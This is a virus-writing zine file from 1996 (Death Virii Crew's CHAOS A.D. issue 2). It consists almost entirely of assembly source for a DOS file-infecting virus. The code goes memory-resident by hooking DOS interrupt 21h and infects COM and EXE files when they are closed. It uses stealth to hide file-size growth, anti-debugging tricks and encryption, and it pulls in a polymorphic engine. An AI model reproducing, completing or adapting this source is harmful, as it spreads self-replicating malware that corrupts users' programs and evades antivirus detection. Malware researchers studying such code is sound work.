[Death Virii Crew] Presents CHAOS A.D. Vmag, Issue 2, Summer 1996 file 002 úThis is only ForeWordú Virus NonDestructive Phantom Stealth RCE AntiHeuristics AntiDebugs MultiCrypt MCB Bugs: Many jmp bugs Fix ??? Want ??? Not You Code Change Sux eeeeee fuck ;========================================================================= .286 .model tiny .code org 100h start: ; Anti Debug Part I call $+3 inc sp inc sp mov si,sp sub word ptr ss:[si-2],3 mov bp,si mov bp,[bp-2] ;- - - - - - - - - - mov di,bp cld push es push cs pop es mov ax,0d07h add di,_begin-1 int 21h inc ax mov ah,al mov ds,ax sub al,0ch ; al=f4h mov ds:[4],al xor ax,ax mov ds:[6],al mov al,ds:[4] push cs pop ds stosb add al,0ch or al,al pop es jz hahaha mov si,bp add si,offset hahaha-100h mov di,si mov cx,1000h mov bx,'67' _z_z: lodsw xor ax,bx add bx,'87' stosw loop _z_z hahaha: cli mov di,ss mov dx,sp mov ax,cs mov ss,ax lea sp,begin-100h+bp ; bp mov cx,len_codir/2+1 asd1: mov bx,0 kod equ $-2 asd: pop ax xor ax,bx push ax inc sp inc sp db 81h,0c3h,0,0 ; add bx,0 dob equ $-2 loop asd1 ; real -> asd _begin equ $-start begin: db 0ebh,1,5 mov sp,dx mov ss,di sti push es ;=====================!=====================!====================== mov ax,0FAACh int 21h cmp ax,0AFAFh jnz wel jmp quit wel: mov si,'EW' xor si,'CL' sub si,'MO' add si,' E' xor si,'OT' or si,'C ' and si,'AH' xor si,'SO' xor si,120dh db 0ebh,1,29h mov ax,es:[si] sub ax,len/16+1 ;------------------------------------------------------------------ mov es:[si],ax ; PSP ... push es mov di,es dec di mov es,di sub word ptr es:[3],len/16+1 ; MCB ? pop es ;------------------------------------------------------------------- shl si,1 shl si,1 shl si,1 sub ax,si db 0ebh,1,33h push es ; psp mov si,ax mov ax,cx ; ANTI DEBUG PART III mov es,cx inc cx inc cx shl cx,1 mov di,cx stosw ; - 1 int shl di,1 stosw ; - 3 int ;- - - - - - - - - db 0ebh,1,5 mov es,si mov si,bp add di,100h-14 ; Anti Debug cld mov cx,len rep movsb pop ds ; psp ; Anti Debug cmp di,len+100h jnz hei ;- - - - - - - - - lea di,old20 mov si,0ah movsw movsw db 0ebh,1,31h mov ax,offset entry20-4841h push ss rol bx,cl pop ss add ax,'HA' mov ds:[0ah],ax mov ds:[0ch],es quit: pop es ;=====================!=====================!=================== mov ax,es mov ds,ax mov bx,cs cmp ax,bx jnz _exe_exit jmp _com_exit _exe_exit: push ds es mov ax,word ptr es:[2ch] mov es,ax xor di,di xor ax,ax mov cx,0fffeh repeat: repne scasb jne sux scasb jne repeat mov al,'.' repne scasb jne sux sub di,3 push cs pop ds lea si,non_stealth-100h+bp ; bp mov cx,8 awa: cmpsw jz fu dec di dec di loop awa jmp sux fu: stosw stosw sux: pop es ds ; Restore SS:SP & Initial CS mov ax,es add ax,10h lea si,@cs-100h+bp add cs:[si],ax ; < ;nop add ax,0 @ss equ cs:[$-2] nop mov ss,ax ; < mov ax,0 @sp equ cs:[$-2] mov sp,ax ; < jmp general_exit hei: mov ax,3 mov ax,2 mov ax,1 db 10 dup (17h) mov ss,ax jmp hei _com_exit: lea si,old3bytes-100h+bp ; bp mov di,100h push cs push di mov cx,3 cld rep movsb lea si,@ip-100h+bp mov ds:[si],100h mov ds:[si+2],cs jmp general_exit ; ;))) general_exit: xor ax,ax mov dx,es mov di,cs mov es,di lea di,crypt_entry-100h+bp mov cx,(buf-crypt_entry)/2+1 relk: in ax,40h rcr ax,cl stosw loop relk mov di,bp add di,3 mov cx,(rel-start)/2-1 cld rel: in ax,40h rcl ax,cl stosw loop rel ; clear: mov bp,91ch mov es,dx mov cx,0ffh mov bx,cs xor si,si mov di,400h cmp dx,bx jnz _exe_ mov si,100h mov di,0fffeh _exe_: xor bx,bx nop db 0eah @ip dw 0 @cs dw 0 ;AX=BX=0 ;CX=FF ;DX=ES=DS = (COM) CS ;SI= (EXE-0) (COM-100) ;DI= (EXE-400) (COM-FFFE) ;BP=91C ;--------------------------- crypt_entry: mov si,offset crypt_1 mov cx,(crypt_2-crypt_1)/2 ;+1 mov ax,0 plus equ $-2 senk: xor ds:[si],ax inc si inc si loop senk ret ;+++++++++++++++++++++++++++++++ HI memory +++++++++++++++++++++++++++++ entry20: nop pusha push ds es pushf push cs pop ds call crypt_entry crypt_1: ;***************************************************** SET MEMORY 655.360 mov ah,52h int 21h mov ax,es:[bx-2] mov bp,ax inc bp ; MCB N 1 - > see bellow mov ds,ax next7: cmp byte ptr ds:[0],5ah jz last mov ax,ds:[3] mov dx,ds add ax,dx inc ax mov ds,ax jmp next7 last: add word ptr ds:[3],len/16+1 ;*********************************************************** END OF BLOCK push cs pop ds mov ah,48h mov bx,(len*3)/16+30 int 21h jc end20 sub ax,10h mov es,ax in ax,40h mov word ptr cs:plus,ax ;++++++++++++++++++ push cs pop ds mov byte ptr ds:[_begin-1+100h],0f1h ; fake loop mov si,100h mov di,si in ax,40h mov bx,ax mov ds:[_non],ax xor dx,dx cld mov cx,_int_21/2-1 ;len nonrez: cmp si,offset crypt_1 jnz non_es mov dx,word ptr cs:plus non_es: cmp si,offset crypt_2 jnz non_ds xor dx,dx non_ds: lodsw xor ax,dx xor ax,bx stosw loop nonrez mov si,offset int_21 mov di,si cld mov cx,len-_int_21 mtmt: movsb mov byte ptr ds:[si-1],cl ; 'R' (4me) loop mtmt mov word ptr es:[0f1h],bp ; owner MCB mov ds,cx mov si,21h*4 lea di,old_21 movsw movsw mov word ptr ds:[si-4],offset int_21 mov word ptr ds:[si-2],es end20: mov di,100h push cs pop es mov cx,offset rtrt-100h-1 rtrt: mov al,cl ; 'N' (4me) stosb loop rtrt popf pop es ds popa db 0eah crypt_2: old20 dd 0 dw '!!' ;--------------------------- REZIDENT PART --------------------------- _int_21 equ $-start int_21: cmp ah,4ch jz final cmp ax,0FAACh jnz @2 mov ax,0AFAFh retf 2 @2: cmp byte ptr cs:stealth,1 jz truble cmp ah,4bh jz exec cmp ah,03eh jnz next jmp close next: cmp ah,4eh jz find cmp ah,4fh jz find jmp truble cmp ah,3dh jnz truble jmp open truble: jmp @3 ;---------------------------------------------------------------------- exec: pusha push es ds push ds pop es push dx pop di mov cx,40h mov al,'.' cld repne scasb jne @888 sub di,3 push cs pop ds lea si,non_stealth mov cl,8 axa: cmpsw jz non dec di dec di loop axa jmp @888 non: mov byte ptr cs:stealth,1 @888: jmp fuck non_stealth db 'NFEBSTANRJIPHAAR' ;---------------------------------------------------------------------- final: mov cs:stealth,0 jmp @3 ;------------------------------------------------------------------------ int_24: mov ax,0 iret old24 dd 0 ;------------------------------------------------------------------------ find: call orig_21 jc end_find pushf push ds es pusha mov ah,2fh int 21h mov ax,word ptr es:[bx+16h] and al,1fh cmp al,7 jnz end_pop ; dec virii len ; com mov dx,bx add dx,1eh mov di,dx mov al,'.' mov cx,40h repne scasb jne end_pop mov ax,es:[di] or ax,2020h mov cl,byte ptr es:[di+2] or cl,20h mov bp,bx cmp ax,'xe' jz exe_next cmp ax,'oc' jnz end_pop com_next: cmp cl,'m' jnz end_pop call common mov di,dx cmp byte ptr ds:[di],0e9h jnz end_pop mov ax,ds:[di+1] add ax,3 checking: mov cx,word ptr es:[bp+1ah] cmp ax,cx ja end_pop real_dec: mov word ptr es:[bp+1ah],ax end_pop: popa pop es ds popf end_find: retf 2 exe_next: cmp cl,'e' jnz end_pop call common xor dx,dx mov ax,word ptr hdrsize mov cx,10h mul cx xchg ax,bx ; in bx mov si,dx mov ax,word ptr _cs mul cx xchg ax,cx ; in cx add dx,si mov ax,word ptr _ip add ax,bx adc dx,0 add ax,cx adc dx,0 ; correct HI word in Length mov cx,word ptr es:[bp+1ch] cmp dx,cx ja end_pop je checking mov word ptr es:[bp+1ch],dx jmp real_dec stealth db 0 common: pop si push es pop ds mov ax,3d00h call orig_21 jc end_pop xchg ax,bx mov ah,3fh mov dx,head push cs pop ds mov cx,20h call orig_21 mov ah,3eh call orig_21 push si ret ;------------------------------------------------------------------------ tim dw 0 dat dw 0 ;------------------------------------------------------------------------ open: jmp @3 ;------------------------------------------------------------------------ db '[úThis is only ForeWordú]' ;------------------------------------------------------------------------ close: pusha push es ds call get_sft mov bp,word ptr es:[di+11h] ; low len mov si,word ptr es:[di+13h] ; hi len cmp es:[di+41],'EX' ; is eXE ? jz _exe_next cmp es:[di+40],'OC' ; is COm ? jz @77 jmp fuck @77: _com_next: cmp es:[di+20h],'OC' ; is COmmand jnz @as1 jmp fuck @as1: cmp bp,60000 ja fuck cmp bp,len jb fuck _exe_next: call check_time jc fuck push cs pop ds call write_inst push si call read_title pop si cmp word ptr ds:[head],'ZM' jz _exe cmp word ptr ds:[head],'MZ' jz _exe mov si,head lodsw mov dl,[si] lea si,old3bytes mov [si],ax mov [si+2],dl ; orig 3 bytes to our buf mov lena,bp mov ax,bp add ax,100h call crypt mov si,bp call write_virii jc fuck24 mov ax,bp sub ax,3 mov word ptr ds:[head+1],ax mov byte ptr ds:[head],0e9h call write_3 jc fuck24 fuck1: mov al,7 call rest_time fuck24: mov ax,word ptr old24+2 mov dx,word ptr old24 mov ds,ax mov ax,2524h int 21h fuck: pop ds es popa @3: db 0eah old_21 dd 0 ;------------------------------------------------------------------------ ;------------------------------------------------------------------------ _exe: ; si = hi byte of len ; bp = low byte of len lastpag equ ds:[head+2] pagecnt equ ds:[head+4] hdrsize equ ds:[head+8] minmem equ ds:[head+0ah] _ss equ ds:[head+0eh] _sp equ ds:[head+10h] chksum equ ds:[head+12h] _ip equ ds:[head+14h] _cs equ ds:[head+16h] mov ax,word ptr pagecnt dec ax mov cx,512 mul cx add ax,word ptr lastpag cmp ax,bp jnz fuck24 cmp dx,si jnz fuck24 push ax push dx mov cx,10h div cx sub ax,word ptr hdrsize sbb dx,0 mov cx,ax ; init CS:IP mov ax,word ptr _ip xor ax,cs:[_non] mov word ptr @ip,ax mov ax,word ptr _cs xor ax,cs:[_non] mov word ptr @cs,ax mov word ptr _ip,dx mov word ptr _cs,cx ; init SS:SP mov ax,word ptr _sp xor ax,cs:[_non] mov word ptr @sp,ax mov ax,word ptr _ss xor ax,cs:[_non] mov word ptr @ss,ax mov word ptr _sp,200h add cx,len/16+1 mov word ptr _ss,cx ; Init MinMem add word ptr minmem,len/16+1 mov ax,word ptr _ip call crypt mov word ptr es:[di+17h],si mov si,bp call write_virii jnc allr jmp fuck24 allr: pop dx pop ax add ax,cx ; len adc dx,0 mov cx,512 div cx inc ax mov word ptr pagecnt,ax mov word ptr lastpag,dx call write_title jnc _AR jmp fuck24 _AR: jmp fuck1 ;------------------------------------------------------------------------ rest_time: mov cx,tim mov dx,dat and cl,0e0h add cl,al mov ax,5701h jmp orig_21 check_time: ; ---------------------------------------------------------- mov ax,word ptr es:[di+0dh] and al,1fh cmp al,7 jz end_time clc ret end_time: stc ret ;------------------------------------------------------------------------ ; cx - pointer in file ; si - len write_virii: mov ah,40h jmp w2 write_3: mov cx,3 jmp wr_bl_0 write_title: mov cx,20h wr_bl_0: xor si,si write_block: mov ah,40h jmp r1 read_title: xor si,si mov cx,20h read_block: mov ah,3fh r1: mov dx,head mov word ptr es:[di+17h],0 w2: mov es:[di+15h],si ;------------------------------------------------------------------------ orig_21: pushf call dword ptr cs:[old_21] ret get_sft: ; ------------------------------------------------------------- push bx mov ax,1220h int 2fh mov bl,es:[di] mov ax,1216h int 2fh pop bx ret write_inst: ;------------------------------------------------------------- save_time: mov ax,es:[di+0dh] mov tim,ax mov ax,es:[di+0fh] mov dat,ax mov word ptr es:[di+2],2 push es bx mov ax,3524h int 21h mov word ptr old24,bx mov word ptr old24+2,es pop bx es mov ax,2524h lea dx,int_24 jmp orig_21 crypt: ; ----------------------------------------------------------------- push es push ax bx si di bp push cs pop es push ax ; - StartIP ; decrypt non-rez part mov si,100h lea di,buf mov cx,_int_21/2-1 ; len yesrez: lodsw xor ax,cs:[_non] stosw loop yesrez ; copy rezident part mov si,offset int_21 mov di,offset buf+_int_21 cld mov cx,len-_int_21 rep movsb ; get crypt kod & dob mov cx,0ffffh call rndf mov dx,cx mov word ptr kod+len,cx mov cx,0ffffh call rndf mov ax,cx mov word ptr dob+len,cx mov di,offset buf+_begin mov cx,len_codir/2+1 dfg: xor ds:[di],dx inc di inc di add dx,ax loop dfg mov bx,base mov ax,cs mov [bx.SegSource],ax mov [bx.SegCrypt],ax mov [bx.OfsSource],offset buf mov [bx.LenSource],len pop ax mov [bx.StartIP],ax mov [bx.OfsCrypt],virbuf call phantom mov cx,[bx.LenCrypt] mov dx,[bx.OfsCrypt] ;ds:dx - out cx - raz pop bp di si bx ax pop es ret ;------------------------------------------------------------------------- _non dw 0 old3bytes db 90h,0cdh,20h stbyt db 0,0,0,0 lena dw len base equ offset buf+len head equ base+50 virbuf equ head+20h e equ 0dh,0ah include amber.asm len_codir equ $-begin len equ $-start buf: end start ;======================================================================= (c) by Reminder [DVC]